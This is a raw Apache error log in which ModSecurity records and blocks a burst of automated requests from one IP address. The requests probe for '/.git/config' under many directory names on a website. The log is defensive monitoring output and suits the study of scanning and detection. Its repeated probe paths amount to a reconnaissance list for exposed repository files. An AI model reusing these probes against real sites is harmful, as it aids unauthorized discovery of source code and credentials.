[Thu May 23 21:50:57.688346 2024] [:error] [pid 3413433] [client 104.234.204.32:45320] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/blog/wp-content/themes/.git/config"] [unique_id "Zk-eITaPQQ881d8bAu5nQQAAAAY"]
[Thu May 23 21:50:57.688867 2024] [:error] [pid 3413433] [client 104.234.204.32:45320] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/blog/wp-content/themes/.git/config"] [unique_id "Zk-eITaPQQ881d8bAu5nQQAAAAY"]
[Thu May 23 21:50:57.708203 2024] [:error] [pid 3413214] [client 104.234.204.32:45322] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /blogs/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/blogs/.git/config"] [unique_id "Zk-eIZzctTAUN3VLWY6UFAAAAAQ"]
[Thu May 23 21:50:57.710538 2024] [:error] [pid 3414898] [client 104.234.204.32:45336] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /build/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/build/.git/config"] [unique_id "Zk-eIdPWiUkCMq8Nf8lwqgAAAAg"]
[Thu May 23 21:50:57.710932 2024] [:error] [pid 3414898] [client 104.234.204.32:45336] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/build/.git/config"] [unique_id "Zk-eIdPWiUkCMq8Nf8lwqgAAAAg"]
[Thu May 23 21:50:57.711209 2024] [:error] [pid 3414898] [client 104.234.204.32:45336] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/build/.git/config"] [unique_id "Zk-eIdPWiUkCMq8Nf8lwqgAAAAg"]
[Thu May 23 21:50:57.712000 2024] [:error] [pid 3413214] [client 104.234.204.32:45322] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/blogs/.git/config"] [unique_id "Zk-eIZzctTAUN3VLWY6UFAAAAAQ"]
[Thu May 23 21:50:57.712227 2024] [:error] [pid 3413214] [client 104.234.204.32:45322] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/blogs/.git/config"] [unique_id "Zk-eIZzctTAUN3VLWY6UFAAAAAQ"]
[Thu May 23 21:50:57.720792 2024] [:error] [pid 3431457] [client 104.234.204.32:45326] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /cms/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/cms/.git/config"] [unique_id "Zk-eIcDLXjxS3Q8qbGS2jgAAAAk"]
[Thu May 23 21:50:57.721213 2024] [:error] [pid 3431457] [client 104.234.204.32:45326] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/cms/.git/config"] [unique_id "Zk-eIcDLXjxS3Q8qbGS2jgAAAAk"]
[Thu May 23 21:50:57.721470 2024] [:error] [pid 3431457] [client 104.234.204.32:45326] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/cms/.git/config"] [unique_id "Zk-eIcDLXjxS3Q8qbGS2jgAAAAk"]
[Thu May 23 21:50:57.721765 2024] [:error] [pid 3413212] [client 104.234.204.32:45338] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /common/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/common/.git/config"] [unique_id "Zk-eIfkOOvNcESBtKtopDQAAAAI"]
[Thu May 23 21:50:57.722359 2024] [:error] [pid 3413212] [client 104.234.204.32:45338] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/common/.git/config"] [unique_id "Zk-eIfkOOvNcESBtKtopDQAAAAI"]
[Thu May 23 21:50:57.722769 2024] [:error] [pid 3413212] [client 104.234.204.32:45338] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/common/.git/config"] [unique_id "Zk-eIfkOOvNcESBtKtopDQAAAAI"]
[Thu May 23 21:50:57.735430 2024] [:error] [pid 3413215] [client 104.234.204.32:45354] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /assets/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/assets/.git/config"] [unique_id "Zk-eIcTZAE7eF0447XNsuQAAAAU"]
[Thu May 23 21:50:57.735929 2024] [:error] [pid 3413215] [client 104.234.204.32:45354] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/assets/.git/config"] [unique_id "Zk-eIcTZAE7eF0447XNsuQAAAAU"]
[Thu May 23 21:50:57.736323 2024] [:error] [pid 3413215] [client 104.234.204.32:45354] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/assets/.git/config"] [unique_id "Zk-eIcTZAE7eF0447XNsuQAAAAU"]
[Thu May 23 21:50:57.743139 2024] [:error] [pid 3414863] [client 104.234.204.32:45356] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /application/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.git/config"] [unique_id "Zk-eIblcUE7FzAkWB0OTrAAAAAc"]
[Thu May 23 21:50:57.743546 2024] [:error] [pid 3414863] [client 104.234.204.32:45356] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.git/config"] [unique_id "Zk-eIblcUE7FzAkWB0OTrAAAAAc"]
[Thu May 23 21:50:57.743925 2024] [:error] [pid 3414863] [client 104.234.204.32:45356] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.git/config"] [unique_id "Zk-eIblcUE7FzAkWB0OTrAAAAAc"]
[Thu May 23 21:50:57.800075 2024] [:error] [pid 3413213] [client 104.234.204.32:45386] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /aomanalyzer/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/aomanalyzer/.git/config"] [unique_id "Zk-eIURtqfe68Tkm9lTpsQAAAAM"]
[Thu May 23 21:50:57.800630 2024] [:error] [pid 3413213] [client 104.234.204.32:45386] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/aomanalyzer/.git/config"] [unique_id "Zk-eIURtqfe68Tkm9lTpsQAAAAM"]
[Thu May 23 21:50:57.801032 2024] [:error] [pid 3413213] [client 104.234.204.32:45386] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/aomanalyzer/.git/config"] [unique_id "Zk-eIURtqfe68Tkm9lTpsQAAAAM"]
[Thu May 23 21:50:57.904597 2024] [:error] [pid 3413433] [client 104.234.204.32:45394] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /amphtml/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/amphtml/.git/config"] [unique_id "Zk-eITaPQQ881d8bAu5nQgAAAAY"]
[Thu May 23 21:50:57.905213 2024] [:error] [pid 3413433] [client 104.234.204.32:45394] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/amphtml/.git/config"] [unique_id "Zk-eITaPQQ881d8bAu5nQgAAAAY"]
[Thu May 23 21:50:57.905632 2024] [:error] [pid 3413433] [client 104.234.204.32:45394] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/amphtml/.git/config"] [unique_id "Zk-eITaPQQ881d8bAu5nQgAAAAY"]
[Thu May 23 21:50:57.908437 2024] [:error] [pid 3413211] [client 104.234.204.32:45396] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /components/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/components/.git/config"] [unique_id "Zk-eIfWGyBPySR9VLpy1kgAAAAE"]
[Thu May 23 21:50:57.909081 2024] [:error] [pid 3413211] [client 104.234.204.32:45396] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/components/.git/config"] [unique_id "Zk-eIfWGyBPySR9VLpy1kgAAAAE"]
[Thu May 23 21:50:57.909567 2024] [:error] [pid 3413211] [client 104.234.204.32:45396] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/components/.git/config"] [unique_id "Zk-eIfWGyBPySR9VLpy1kgAAAAE"]
[Thu May 23 21:50:57.925418 2024] [authz_core:error] [pid 3414898] [client 104.234.204.32:45406] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.git
[Thu May 23 21:50:57.926724 2024] [:error] [pid 3413214] [client 104.234.204.32:45410] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /config/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/.git/config"] [unique_id "Zk-eIZzctTAUN3VLWY6UFQAAAAQ"]
[Thu May 23 21:50:57.927140 2024] [:error] [pid 3413214] [client 104.234.204.32:45410] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/.git/config"] [unique_id "Zk-eIZzctTAUN3VLWY6UFQAAAAQ"]
[Thu May 23 21:50:57.927396 2024] [:error] [pid 3413214] [client 104.234.204.32:45410] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/.git/config"] [unique_id "Zk-eIZzctTAUN3VLWY6UFQAAAAQ"]
[Thu May 23 21:50:57.935987 2024] [:error] [pid 3431457] [client 104.234.204.32:45426] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /content/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/content/.git/config"] [unique_id "Zk-eIcDLXjxS3Q8qbGS2jwAAAAk"]
[Thu May 23 21:50:57.936578 2024] [:error] [pid 3431457] [client 104.234.204.32:45426] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/content/.git/config"] [unique_id "Zk-eIcDLXjxS3Q8qbGS2jwAAAAk"]
[Thu May 23 21:50:57.936952 2024] [:error] [pid 3431457] [client 104.234.204.32:45426] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/content/.git/config"] [unique_id "Zk-eIcDLXjxS3Q8qbGS2jwAAAAk"]
[Thu May 23 21:50:57.938132 2024] [:error] [pid 3413212] [client 104.234.204.32:45440] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /admin/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.git/config"] [unique_id "Zk-eIfkOOvNcESBtKtopDgAAAAI"]
[Thu May 23 21:50:57.938451 2024] [:error] [pid 3413212] [client 104.234.204.32:45440] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.git/config"] [unique_id "Zk-eIfkOOvNcESBtKtopDgAAAAI"]
[Thu May 23 21:50:57.938706 2024] [:error] [pid 3413212] [client 104.234.204.32:45440] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.git/config"] [unique_id "Zk-eIfkOOvNcESBtKtopDgAAAAI"]
[Thu May 23 21:50:57.950449 2024] [:error] [pid 3413215] [client 104.234.204.32:45446] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /css/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/css/.git/config"] [unique_id "Zk-eIcTZAE7eF0447XNsugAAAAU"]
[Thu May 23 21:50:57.950748 2024] [:error] [pid 3413215] [client 104.234.204.32:45446] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/css/.git/config"] [unique_id "Zk-eIcTZAE7eF0447XNsugAAAAU"]
